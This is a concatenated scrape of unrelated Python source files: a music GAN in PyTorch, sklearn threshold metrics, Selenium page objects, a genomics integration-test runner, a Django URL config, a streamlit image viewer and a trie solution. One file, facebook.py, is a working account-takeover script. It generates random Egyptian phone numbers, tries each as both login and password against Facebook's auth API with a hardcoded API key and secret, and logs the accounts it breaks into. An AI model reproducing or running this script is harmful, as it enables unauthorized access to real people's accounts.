self.h1 = nn.ConvTranspose2d(in_channels=144, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h2 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h3 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h4 = nn.ConvTranspose2d(in_channels=25, out_channels=1, kernel_size=(1,pitch_range), stride=(1,2))
self.h0_prev = nn.Conv2d(in_channels=1, out_channels=16, kernel_size=(1,pitch_range), stride=(1,2))
self.h1_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h2_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h3_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.linear1 = nn.Linear(100,1024*2)
self.linear2 = nn.Linear(1024*2,self.gf_dim*2*2*1)
def forward(self, z, prev_x,batch_size,pitch_range):
# h3_prev = F.leaky_relu(self.batch_nor_256(self.h0_prev(prev_x)),0.2)
h0_prev = lrelu(batch_norm_2d(self.h0_prev(prev_x)),0.2) #[72, 16, 16, 1]
# print(h0_prev.size(),"h0_prev generator")
h1_prev = lrelu(batch_norm_2d(self.h1_prev(h0_prev)),0.2) #[72, 16, 8, 1]
# print(h1_prev.size(),"h1_prev generator")
h2_prev = lrelu(batch_norm_2d(self.h2_prev(h1_prev)),0.2) #[72, 16, 4, 1]
h3_prev = lrelu(batch_norm_2d(self.h3_prev(h2_prev)),0.2) #[72, 16, 2, 1])
# yb = y.view(batch_size, self.y_dim, 1, 1) #(72,13,1,1)
# z = torch.cat((z,y),1) #(72,113)
h0 = F.relu(batch_norm_1d(self.linear1(z))) #(72,1024)
# print(h0.size())
# h0 = torch.cat((h0,y),1) #(72,1037)
h1 = F.relu(batch_norm_1d(self.linear2(h0))) #(72, 256)
h1 = h1.view(batch_size, self.gf_dim * 2, 2, 1) #(72,128,2,1)
# print(h1.size(),"h1 size")
# h1 = conv_cond_concat(h1,yb) #(b,141,2,1)
h1 = conv_prev_concat(h1,h3_prev) #(72, 157, 2, 1)
# print(h1.size(),"h1 size")
h2 = F.relu(batch_norm_2d(self.h1(h1))) #(72, 128, 4, 1)
# print(h2.size(),"h2 size")
# h2 = conv_cond_concat(h2,yb) #([72, 141, 4, 1])
h2 = conv_prev_concat(h2,h2_prev) #([72, 157, 4, 1])
# print(h2.size(),"h2size")
h3 = F.relu(batch_norm_2d(self.h2(h2))) #([72, 128, 8, 1])
# print(h3.size(),"h3size")
# h3 = conv_cond_concat(h3,yb) #([72, 141, 8, 1])
h3 = conv_prev_concat(h3,h1_prev) #([72, 157, 8, 1])
h4 = F.relu(batch_norm_2d(self.h3(h3))) #([72, 128, 16, 1])
# print(h4.size(),"h4size")
# h4 = conv_cond_concat(h4,yb) #([72, 141, 16, 1])
h4 = conv_prev_concat(h4,h0_prev) #([72, 157, 16, 1])
g_x = torch.sigmoid(self.h4(h4)) #([72, 1, 16, 128])
# print(g_x.size())
return g_x
class discriminator(nn.Module):
def __init__(self,pitch_range):
super(discriminator, self).__init__()
self.df_dim = 64
self.dfc_dim = 1024*2
self.y_dim = 13
self.h0_prev = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(2,pitch_range), stride=(2,2))
#out channels = y_dim +1
self.h1_prev = nn.Conv2d(in_channels=1, out_channels=77, kernel_size=(4,1), stride=(2,2))
# out channels = df_dim + y_dim
self.linear1 = nn.Linear(231,self.dfc_dim)
self.linear2 = nn.Linear(self.dfc_dim,1)
def forward(self,x,batch_size,pitch_range):
# yb = y.view(batch_size,self.y_dim, 1, 1)
# x = conv_cond_concat(x, yb) #x.shape torch.Size([72, 14, 16, 128])
h0 = lrelu(self.h0_prev(x),0.2)
fm = h0
# h0 = conv_cond_concat(h0, yb) #torch.Size([72, 27, 8, 1])
h1 = lrelu(batch_norm_2d(self.h1_prev(h0)),0.2) #torch.Size([72, 77, 3, 1])
# print(h1.size(),"h1 size dis")
h1 = h1.view(batch_size, -1) #torch.Size([72, 231])
# h1 = torch.cat((h1,y),1) #torch.Size([72, 244])
h2 = lrelu(batch_norm_1d(self.linear1(h1)))
# h2 = torch.cat((h2,y),1) #torch.Size([72, 1037])
h3 = self.linear2(h2)
h3_sigmoid = torch.sigmoid(h3)
return h3_sigmoid, h3, fm
|
[
"frederic.tamagnan@gmail.com"
] |
frederic.tamagnan@gmail.com
|
caccd1355ec8d538d438f380c59e87e6f0d3d43c
|
ba80848eab0bdbbf73bc79c1b88cff32b2f83b61
|
/hands-on-ml-zh/02/main.py
|
1c6798ff7d332418b4f0bd71e60545775b322886
|
[] |
no_license
|
1SOU/2019ex
|
9c4cffbeeb0a476c8606348a77e2847d5b8ef362
|
7f0076a455533bf09f30b274fb06d16bdbc3398b
|
refs/heads/master
| 2020-07-26T15:03:04.084831
| 2019-09-16T01:33:50
| 2019-09-16T01:33:50
| 208,685,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 22 09:10:46 2019
@author: Yisoul
"""
|
[
"2381824597@qq.com"
] |
2381824597@qq.com
|
ee206e8d4a00724240ebf254d91d1e8941978264
|
a6355ef8ddb4d31fb4ff45ae755f34482d8c0ff9
|
/supervised/models/compute_additional_metrics.py
|
e74e522c6eeaa975273774befac8d3433b6506e2
|
[
"MIT"
] |
permissive
|
michaelneale/mljar-supervised
|
d4d1b44f4cd5dcbdb36768c5186f2480a53ec3f7
|
8d1b5fdd56e994a7f13ec5f6d2033830744f3d6f
|
refs/heads/master
| 2022-02-06T14:11:21.377791
| 2019-11-05T08:15:02
| 2019-11-05T08:15:02
| 220,161,447
| 0
| 0
|
MIT
| 2022-01-26T00:32:56
| 2019-11-07T05:51:34
| null |
UTF-8
|
Python
| false
| false
| 3,084
|
py
|
import logging
import copy
import numpy as np
import pandas as pd
import time
import uuid
from supervised.tuner.registry import BINARY_CLASSIFICATION
from sklearn.metrics import (
f1_score,
accuracy_score,
precision_score,
recall_score,
matthews_corrcoef,
roc_auc_score,
confusion_matrix,
)
log = logging.getLogger(__name__)
class ComputeAdditionalMetrics:
@staticmethod
def compute(target, predictions, ml_task):
if ml_task != BINARY_CLASSIFICATION:
return {}
sorted_predictions = np.sort(predictions)
STEPS = 100
details = {
"threshold": [],
"f1": [],
"accuracy": [],
"precision": [],
"recall": [],
"mcc": [],
}
samples_per_step = max(1, np.floor(predictions.shape[0] / STEPS))
for i in range(1, STEPS):
idx = int(i * samples_per_step)
if idx + 1 >= predictions.shape[0]:
break
th = 0.5 * (sorted_predictions[idx] + sorted_predictions[idx + 1])
if np.sum(predictions > th) < 1:
break
response = (predictions > th).astype(int)
details["threshold"] += [th]
details["f1"] += [f1_score(target, response)]
details["accuracy"] += [accuracy_score(target, response)]
details["precision"] += [precision_score(target, response)]
details["recall"] += [recall_score(target, response)]
details["mcc"] += [matthews_corrcoef(target, response)]
# max metrics
max_metrics = {
"auc": {
"score": roc_auc_score(target, predictions),
"threshold": None,
}, # there is no threshold for AUC :)
"f1": {
"score": np.max(details["f1"]),
"threshold": details["threshold"][np.argmax(details["f1"])],
},
"accuracy": {
"score": np.max(details["accuracy"]),
"threshold": details["threshold"][np.argmax(details["accuracy"])],
},
"precision": {
"score": np.max(details["precision"]),
"threshold": details["threshold"][np.argmax(details["precision"])],
},
"recall": {
"score": np.max(details["recall"]),
"threshold": details["threshold"][np.argmax(details["recall"])],
},
"mcc": {
"score": np.max(details["mcc"]),
"threshold": details["threshold"][np.argmax(details["mcc"])],
},
}
# confusion matrix
conf_matrix = confusion_matrix(
target, predictions > max_metrics["f1"]["threshold"]
)
conf_matrix = pd.DataFrame(
conf_matrix,
columns=["Predicted as negative", "Predicted as positive"],
index=["Labeled as negative", "Labeled as positive"],
)
return pd.DataFrame(details), pd.DataFrame(max_metrics), conf_matrix
|
[
"pplonski86@gmail.com"
] |
pplonski86@gmail.com
|
6118aac454787deedc978d8651554562c83be1cd
|
f0dd1343ad57362c91c19d1ae46089e33777b988
|
/pageobjects/ResourceManage/GroupResource_page.py
|
e85491bc23b2c8d890763d5caa8d8153f76e38d2
|
[] |
no_license
|
heshuiming/AutoTest
|
f786b1feee02bf94d6e8f0adec4eda2861a933a4
|
03440ca956e469733b4f4000af40f93625b2a4ee
|
refs/heads/master
| 2020-05-14T23:30:24.713383
| 2019-04-29T11:03:29
| 2019-04-29T11:03:29
| 181,997,942
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,206
|
py
|
from unit.base_page import BasePage
from time import sleep
#本组资源
class GroupResourcePage(BasePage):
#咨询类别
consultation_1 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'雅思')]" # 雅思
consultation_2 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'北美')]" # 北美
consultation_8 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'大客户')]" # 大客户
consultation_11 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'加拿大留学')]" # 加拿大留学
consultation_12 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'澳大利亚留学')]" # 澳大利亚留学
def Consultation(self, consultation):
if consultation == 1:
self.click(self.consultation_1)
elif consultation == 2:
self.click(self.consultation_2)
elif consultation == 8:
self.click(self.consultation_8)
elif consultation == 11:
self.click(self.consultation_11)
elif consultation == 12:
self.click(self.consultation_12)
else:
print("请给出正确的咨询方向!")
#来源
source_type_0 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'客服')]" #客服
source_type_1 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'销售')]" #销售
source_type_2 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'市场活动')]" #市场活动
source_type_3 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'渠道')]" #渠道
source_type_4 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'TMK')]" #Tmk
source_type_6 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'新媒体')]" #新媒体
source_type_7 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'其他学校')]" #其他学校
source_type_8 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'口碑资源')]" #口碑资源
source_type_9 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'搜课')]" #搜课
def Source(self, type):
if type == 1:
self.click(self.source_type_0)
elif type == 2:
self.click(self.source_type_1)
elif type == 3:
self.click(self.source_type_2)
elif type == 4:
self.click(self.source_type_3)
elif type == 5:
self.click(self.source_type_4)
elif type == 6:
self.click(self.source_type_6)
elif type == 7:
self.click(self.source_type_7)
elif type == 8:
self.click(self.source_type_8)
elif type == 9:
self.click(self.source_type_9)
# elif type == 10:
# self.click(self.infomationType_10)
# elif type == 11:
# self.click(self.infomationType_11)
else:
print("请给出正确的来源")
#搜索
counselorName_input = "xpath=>//input[@placeholder='当前负责人']"
studentName_input = "xpath=>//input[@placeholder='学员姓名']"
telephone_input = "xpath=>//input[@placeholder='手机号']"
# pid_input = "name=>pid"
search_btn = "id=>search"
def SearchCondition(self,**info):
if info['counselorName']:
self.send_keys(self.counselorName_input,info['counselorName'])
self.click(self.search_btn)
elif info['studentName']:
self.send_keys(self.studentName_input,info['studentName'])
self.click(self.search_btn)
elif info['telephone']:
self.send_keys(self.telephone_input,info['telephone'])
self.click(self.search_btn)
# elif info['pid']:
# self.send_keys(self.pid_input,info['pid'])
# self.click(self.search_btn)
else:
self.click(self.search_btn)
#查看
check_btn = "xpath=>//tbody/tr[1]/td[2]/div/button"
def Check(self):
self.click(self.check_btn)
|
[
"heshuiming@pxjy.com"
] |
heshuiming@pxjy.com
|
8ed898a821efe6042373dea98279e07c01c08044
|
e006ba80e39ed9cfda121881f03a62c097cb4614
|
/gcp_variant_transforms/testing/integration/run_tests_common.py
|
4fe4bb677249af2fbbccf33b614cf17ec9d343b1
|
[
"Apache-2.0"
] |
permissive
|
thuylevn/gcp-variant-transforms
|
aee27f061451a5f23b7d3024f65eda1c2ab52bec
|
d0b77a6acdf3f0a0d1274fe4eb54d6ee27ce427a
|
refs/heads/master
| 2020-07-10T16:51:40.954884
| 2019-08-20T14:40:26
| 2019-08-20T14:40:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,452
|
py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common functions and classes that are used by integration tests.
It provides common functions and classes for both run_vcf_to_bq_tests
(integration test script for vcf_to_bq pipeline) and run_preprocessor_tests
(integration test script for vcf_to_bq_preprocess pipeline).
"""
import argparse # pylint: disable=unused-import
import json
import os
import subprocess
import time
from collections import namedtuple
from typing import Dict, List, Optional # pylint: disable=unused-import
_DEFAULT_IMAGE_NAME = 'gcr.io/cloud-lifesciences/gcp-variant-transforms'
_DEFAULT_ZONES = ['us-east1-b']
# `TestCaseState` saves current running test and the remaining tests in the same
# test script (.json).
TestCaseState = namedtuple('TestCaseState',
['running_test', 'remaining_tests'])
class TestCaseInterface(object):
"""Interface of an integration test case."""
def validate_result(self):
"""Validates the result of the test case."""
raise NotImplementedError
class TestCaseFailure(Exception):
"""Exception for failed test cases."""
pass
class TestRunner(object):
"""Runs the tests using pipelines API."""
def __init__(self, tests, revalidate=False):
# type: (List[List[TestCaseInterface]], bool) -> None
"""Initializes the TestRunner.
Args:
tests: All test cases.
revalidate: If True, only run the result validation part of the tests.
"""
self._tests = tests
self._revalidate = revalidate
self._test_names_to_test_states = {} # type: Dict[str, TestCaseState]
self._test_names_to_processes = {} # type: Dict[str, subprocess.Popen]
def run(self):
"""Runs all tests."""
if self._revalidate:
for test_cases in self._tests:
# Only validates the last test case in one test script since the table
# created by one test case might be altered by the following up ones.
test_cases[-1].validate_result()
else:
for test_cases in self._tests:
self._run_test(test_cases)
self._wait_for_all_operations_done()
def _run_test(self, test_cases):
# type: (List[TestCaseInterface]) -> None
"""Runs the first test case in `test_cases`.
The first test case and the remaining test cases form `TestCaseState` and
are added into `_test_names_to_test_states` for future usage.
"""
if not test_cases:
return
self._test_names_to_test_states.update({
test_cases[0].get_name(): TestCaseState(test_cases[0], test_cases[1:])})
self._test_names_to_processes.update(
{test_cases[0].get_name(): subprocess.Popen(
test_cases[0].run_test_command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)})
def _wait_for_all_operations_done(self):
"""Waits until all operations are done."""
while self._test_names_to_processes:
time.sleep(10)
running_test_names = self._test_names_to_processes.keys()
for test_name in running_test_names:
running_proc = self._test_names_to_processes.get(test_name)
return_code = running_proc.poll()
if return_code is not None:
test_case_state = self._test_names_to_test_states.get(test_name)
self._handle_failure(running_proc, test_case_state.running_test)
del self._test_names_to_processes[test_name]
test_case_state.running_test.validate_result()
self._run_test(test_case_state.remaining_tests)
def _handle_failure(self, proc, test_case):
"""Raises errors if test case failed."""
if proc.returncode != 0:
stdout, stderr = proc.communicate()
raise TestCaseFailure('Test case {} failed. stdout: {}, stderr: {}, '
'return code: {}.'.format(test_case.get_name(),
stdout, stderr,
proc.returncode))
def print_results(self):
"""Prints results of test cases."""
for test_cases in self._tests:
for test_case in test_cases:
print '{} ...ok'.format(test_case.get_name())
return 0
def form_command(project, temp_location, image, tool_name, zones, args):
# type: (str, str, str, str, Optional[List[str]], List[str]) -> List[str]
return ['/opt/gcp_variant_transforms/src/docker/pipelines_runner.sh',
'--project', project,
'--docker_image', image,
'--temp_location', temp_location,
'--zones', str(' '.join(zones or _DEFAULT_ZONES)),
' '.join([tool_name] + args)]
def add_args(parser):
# type: (argparse.ArgumentParser) -> None
"""Adds common arguments."""
parser.add_argument('--project', required=True)
parser.add_argument('--staging_location', required=True)
parser.add_argument('--temp_location', required=True)
parser.add_argument('--logging_location', required=True)
parser.add_argument(
'--image',
help=('The name of the container image to run the test against it, for '
'example: gcr.io/test-gcp-variant-transforms/'
'test_gcp-variant-transforms_2018-01-20-13-47-12. By default the '
'production image {} is used.').format(_DEFAULT_IMAGE_NAME),
default=_DEFAULT_IMAGE_NAME,
required=False)
def get_configs(test_file_dir, required_keys, test_file_suffix=''):
# type: (str, List[str], str) -> List[List[Dict]]
"""Gets test configs.
Args:
test_file_dir: The directory where the test cases are saved.
required_keys: The keys that are required in each test case.
test_file_suffix: If empty, all test cases in `test_file_path` are
considered. Otherwise, only the test cases that end with this suffix will
run.
Raises:
TestCaseFailure: If no test cases are found.
"""
test_configs = []
test_file_suffix = test_file_suffix or '.json'
for root, _, files in os.walk(test_file_dir):
for filename in files:
if filename.endswith(test_file_suffix):
test_configs.append(_load_test_configs(os.path.join(root, filename),
required_keys))
if not test_configs:
raise TestCaseFailure('Found no {} file in directory {}'.format(
test_file_suffix, test_file_dir))
return test_configs
def _load_test_configs(filename, required_keys):
# type: (str, List[str]) -> List[Dict]
"""Loads an integration test JSON object from a file."""
with open(filename, 'r') as f:
tests = json.loads(f.read())
_validate_test_configs(tests, filename, required_keys)
return tests
def _validate_test_configs(test_configs, filename, required_keys):
# type: (List[Dict], str, List[str]) -> None
for key in required_keys:
for test_config in test_configs:
if key not in test_config:
raise ValueError('Test case in {} is missing required key: {}'.format(
filename, key))
|
[
"noreply@github.com"
] |
thuylevn.noreply@github.com
|
4d14e85f72f60042cb859ef7ccddd176ed9c872b
|
64e8f8e7ede25b76997e77c09204679f63ffb946
|
/activities/urls.py
|
a2101fd407fe31a9a7e39e83f5b0e81a3efed336
|
[] |
no_license
|
noelroy/pharmacy
|
f4f1849e678bd4715d05ea710c78e65c666e57d9
|
b2a90f5622b21ac60a189b9b17ba7511cd344c54
|
refs/heads/master
| 2021-09-08T14:59:10.383647
| 2021-08-25T18:45:26
| 2021-08-25T18:45:26
| 84,398,400
| 7
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
from django.conf.urls import url
from activities import views
urlpatterns = [
url(r'^orders/create$', views.create_order, name='create_order'),
url(r'^orders/get_company_list$', views.get_company_list, name='get_company_list_order'),
]
|
[
"noelroy96@gmail.com"
] |
noelroy96@gmail.com
|
4114e81d545e8d1b52a61627033bba787df43ae4
|
e67cef71640b868ac23f750ef6a485bd938013df
|
/facebook.py
|
a2f411f13ddc72551c24118ff8a5a7ccf76ab208
|
[] |
no_license
|
mahmoudhany1/facebookCreator
|
58b879027591dc6920577c638357c1b3187881cc
|
93567c7f1389ad22f13d6617556ed5020fb86bbe
|
refs/heads/master
| 2020-03-31T14:43:29.975718
| 2018-10-09T19:09:41
| 2018-10-09T19:09:41
| 152,306,726
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,690
|
py
|
print """ Mahmoud Hany Security
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
My Acount On Facebook
https://www.facebook.com/mahmoudhanyhack
"""
import threading
import random
import string
import hashlib
import json
from urllib import urlencode
import collections
import urllib2
import sys
import os
os.system('color 6')
raw_input ("Enter Number Of Acounts : ")
print """
Now is Get Acounts ^_^
"""
phoneLen = 11
providers = ["012","015","011","010"]
Threadtimeout = 5
ThreadPoolSize = 20
storeThreads = []
validhits = set()
def threadManager(function,Funcargs,Startthreshold,Threadtimeout=5):
if len(storeThreads) != Startthreshold:
storeThreads.append(threading.Thread(target=function,args=tuple(Funcargs) ))
if len(storeThreads) == Startthreshold:
for metaThread in storeThreads:
metaThread.start()
for metaThread in storeThreads:
metaThread.join(Threadtimeout)
del storeThreads[::]
def accessToken(email,password):
data = collections.OrderedDict()
data["api_key"] = "882a8490361da98702bf97a021ddc14d"
data["email"] = str(email)
data["format"]= "JSON"
data["locale"] = "vi_vn"
data["method"] = "auth.login"
data["password"] = str(password)
data["return_ssl_resources"] = "0"
data["v"] = "1.0"
sig = ""
for key in data:
sig += "{0}={1}".format(key,data[key])
data["sig"] = hashlib.md5(sig+"62f8ce9f74b12f84c123cc23437a4a32").hexdigest()
try:
return json.loads(urllib2.urlopen("https://api.facebook.com/restserver.php?{0}".format(urlencode(data))).read())["access_token"]
except:
return False
def login(n):
status = accessToken(n,n)
if status != False:
validhits.add(n)
def GenPhoneNumber():
provider = providers[random.randint(0,len(providers)-1 )]
numbers = (''.join(random.choice(string.digits) for i in range(phoneLen - len(provider) )))
return "{}{}".format(provider,numbers)
old = 0
while(1):
threadManager( login, [GenPhoneNumber()] , ThreadPoolSize ,Threadtimeout)
if len(validhits) != old:
for n in validhits:
open("acounts.txt","a").write(str(n)+"\n")
r = set(open("acounts.txt","r").read().split("\n"))
open("acounts.txt","w").write("")
for n in r:
open("acounts.txt","a").write(str(n)+"\n")
old = len(validhits)
print " You Have {} Acount ^_^ : ".format(len(validhits))
|
[
"noreply@github.com"
] |
mahmoudhany1.noreply@github.com
|
5ff41892cdff2e8c2bf0ec19a9f07d27a6f47528
|
4c6d13afe5a6846be002248774261309ad4a9445
|
/learning_templates/basic_app/urls.py
|
1d6e16827193d75966bfc84f8880b2f3f4faa1af
|
[] |
no_license
|
JiGzZz/django-deployment-example
|
8629007c7fd95f3ed54c0a51dd8036512943a184
|
e207ea950dc4e197262b5f65a83c2dd4851483d5
|
refs/heads/master
| 2020-04-17T12:35:18.985796
| 2019-01-19T20:22:58
| 2019-01-19T20:22:58
| 166,585,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
from django.urls import path
from basic_app import views
# TEMPLATE TAGGING
app_name = 'basic_app'
urlpatterns = [
path('relative/',views.relative,name='relative'),
path('other/',views.other,name='other'),
]
|
[
"developer.jigardhulla@gmail.com"
] |
developer.jigardhulla@gmail.com
|
472cadaf32afaeb4b58e1c709b41a3c59a831a37
|
2e56d10d7b8def30dcc46b2a0240ee702caf393d
|
/stream.py
|
e9e2f73b105c55bdf6c2f87f913f5b5fef6b3f81
|
[] |
no_license
|
sweetcocoa/streamlit_image_explorer
|
15309380e56b555fe3fb54cb7fe979d8b5e1d649
|
70a3b0f017bc0e552180f9e03ea3a7d4d099c7ec
|
refs/heads/main
| 2023-06-19T17:52:23.660373
| 2021-07-09T05:41:36
| 2021-07-09T05:41:36
| 379,520,194
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,256
|
py
|
import streamlit as st
import numpy as np
import os
import urllib
import glob
import SessionState
import cv2
# DATA_URL_ROOT = st.secrets['DATA_URL_ROOT']
# DATA_URL_ROOT = "data/"
DATA_URL_ROOT = (
"https://raw.githubusercontent.com/sweetcocoa/streamlit_image_explorer/master/"
)
session_state = SessionState.get(image_idx=0)
files = dict(train=list(), val=list())
data_split = "train"
test_on_local = False
if test_on_local:
def get_file_list(base_path):
images = sorted(glob.glob(f"{base_path}/**/*.png", recursive=True))
images = [image.replace("\\", "/") for image in images]
return images
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
return open(path, "r").read()
@st.cache(show_spinner=False)
def load_image(url, resize=None):
image = cv2.imread(url, cv2.IMREAD_COLOR)
if resize is not None:
image = cv2.resize(image, dsize=resize, interpolation=cv2.INTER_LINEAR)
image = image[:, :, [2, 1, 0]] # BGR -> RGB
return image
else:
def get_file_list(base_path):
images = sorted(glob.glob(f"{base_path}/**/*.png", recursive=True))
images = [(DATA_URL_ROOT + image).replace("\\", "/") for image in images]
return images
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
global DATA_URL_ROOT
url = DATA_URL_ROOT + path
response = urllib.request.urlopen(url)
return response.read().decode("utf-8")
@st.cache(show_spinner=False)
def load_image(url, resize=None):
with urllib.request.urlopen(url) as response:
image = np.asarray(bytearray(response.read()), dtype="uint8")
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
if resize is not None:
image = cv2.resize(image, dsize=resize, interpolation=cv2.INTER_LINEAR)
image = image[:, :, [2, 1, 0]] # BGR -> RGB
return image
def label_of(path):
return path.split("/")[-2]
def split_of(path):
# print(path)
return path.split("/")[-3]
def image_explorer():
global session_state, data_split, files
image_idx = session_state.image_idx
title_columns = st.beta_columns(2)
data_split = title_columns[0].radio("Choose data split", ("train", "val"))
is_resized = title_columns[1].checkbox(
"Resize",
value=False,
)
# data_split = st.
num_images_row = st.slider(
"Number of Images in a Row",
min_value=1,
max_value=10,
value=1,
step=1,
format=None,
key=None,
help=None,
)
num_images_col = 5
number_of_images_in_page = int(num_images_col * num_images_row)
exploer_buttons = st.beta_columns(2)
prev_button = exploer_buttons[0].button("Prev Images")
next_button = exploer_buttons[1].button("Next Images")
if prev_button:
image_idx = max(image_idx - number_of_images_in_page, 0)
session_state.image_idx = image_idx
if next_button:
image_idx = min(image_idx + number_of_images_in_page, len(files[data_split]))
session_state.image_idx = image_idx
st.header(
f"Images from {image_idx} to {min(len(files[data_split]), image_idx + num_images_col * (num_images_row))} / {len(files[data_split])}"
)
columns = st.beta_columns(num_images_row)
for i in range(len(columns)):
start_idx = image_idx + i * num_images_col
end_idx = min(start_idx + num_images_col, len(files[data_split]))
# print(start_idx, end_idx)
if not is_resized:
columns[i].image(
files[data_split][start_idx:end_idx],
caption=[
f"{label_of(files[data_split][i])}, {i}"
for i in range(start_idx, end_idx)
],
)
else:
columns[i].image(
[
load_image(files[data_split][i], resize=(32, 32))
for i in range(start_idx, end_idx)
],
caption=[
f"{label_of(files[data_split][i])}, {i}"
for i in range(start_idx, end_idx)
],
)
def main():
global files
# Once we have the dependencies, add a selector for the app mode on the sidebar.
st.sidebar.title("Image Explorer")
front_text = st.markdown(get_file_content_as_string("front.md"))
_files = get_file_list("data/")
for file in _files:
split = split_of(file)
files[split].append(file)
app_mode = st.sidebar.selectbox(
"Choose the app mode", ["Show instructions", "Launch", "Show the source code"]
)
if app_mode == "Show instructions":
st.sidebar.success('To Launch Explorer, Select "Launch".')
elif app_mode == "Show the source code":
front_text.empty()
st.code(get_file_content_as_string("stream.py"))
elif app_mode == "Launch":
front_text.empty()
image_explorer()
if __name__ == "__main__":
main()
|
[
"sweetcocoa@snu.ac.kr"
] |
sweetcocoa@snu.ac.kr
|
2befe1a095c5cca705e4984daeef32dbf5cc58e9
|
cb4e5259ae2e67bc36feb059819e78d9b2f6644b
|
/wlutil/__init__.py
|
5d1c5b946a2a6465b23c0abc8b2bf27aa23f80e2
|
[
"LicenseRef-scancode-bsd-3-clause-jtag"
] |
permissive
|
abejgonzalez/FireMarshal
|
bf7645684c0c418840c29e95a0da2f7fae0d4aeb
|
56c050e8be3d3c9cfe5be6b777a5a82de47a14d4
|
refs/heads/master
| 2020-08-31T08:44:10.693786
| 2019-10-22T01:08:55
| 2019-10-22T01:08:55
| 218,650,718
| 0
| 0
|
NOASSERTION
| 2019-10-31T00:19:01
| 2019-10-31T00:19:01
| null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
"""
Utilities for dealing with FireSim workloads
"""
from .wlutil import *
from .build import buildWorkload
from .launch import launchWorkload
from .test import testWorkload,testResult
from .install import installWorkload
from .config import ConfigManager
|
[
"nathanp@berkeley.edu"
] |
nathanp@berkeley.edu
|
c1d8b8802fa2dbe27d011b791fec7a5a85e50004
|
a3f80da27fee10ad2fc924020deb3aa8b19fdb96
|
/src/boj/boj5052/Main.py
|
399a0a2558a589e3a51edd163e278352f0711b44
|
[] |
no_license
|
jeemyeong/problem-solving
|
dad4bfe6fa0cc08678b5caebb7dcb751ef8c72d8
|
add26360ebe9758bc2f050545c93edfaf8cd342a
|
refs/heads/master
| 2021-05-16T17:54:37.804842
| 2018-07-15T11:25:53
| 2018-07-15T11:25:53
| 103,120,018
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,183
|
py
|
import sys
def I(): return int(sys.stdin.readline())
def S(): return input()
class Trie(object):
def __init__(self, initial = False):
if initial:
self.trie = {"initial": True}
else:
self.trie = {"initial": False}
def insert(self, node):
if len(node) == 0:
return
if node[0] in self.trie:
self.trie[node[0]].insert(node[1:])
else:
self.trie[node[0]] = Trie()
self.trie[node[0]].insert(node[1:])
def count(self):
return len(self.trie)-1
def isInitial(self):
return self.trie["initial"]
def isEmpty(self):
if self.count() == 0:
return True
else:
return False
def check(self, node):
if len(node) == 0 or (self.isEmpty() and not self.isInitial()):
return True
if node[0] in self.trie:
return self.trie[node[0]].check(node[1:])
else:
return False
def solve2(lst): #51588 KB 7644 MS
trie = Trie(initial = True)
for item in lst:
if trie.check(item):
return "NO"
trie.insert(item)
return "YES"
def insertToTrie(trie, node):
if len(node) == 0:
return
if node[0] in trie:
insertToTrie(trie[node[0]], node[1:])
else:
trie[node[0]] = {}
insertToTrie(trie[node[0]], node[1:])
def checkInTrie(trie, node):
if len(node) == 0 or len(trie) == 0:
return True
if node[0] in trie:
return checkInTrie(trie[node[0]], node[1:])
else:
return False
def solve3(lst): #41924 KB 6420 MS
trie = {"INITIAL": "TRUE"}
for item in lst:
if checkInTrie(trie, item):
return "NO"
insertToTrie(trie, item)
return "YES"
def solve(lst): #29128 KB 5392 MS
lst.sort()
for i in range(len(lst)-1):
if len(lst[i]) < len(lst[i+1]) and lst[i] == lst[i+1][:len(lst[i])]:
return "NO"
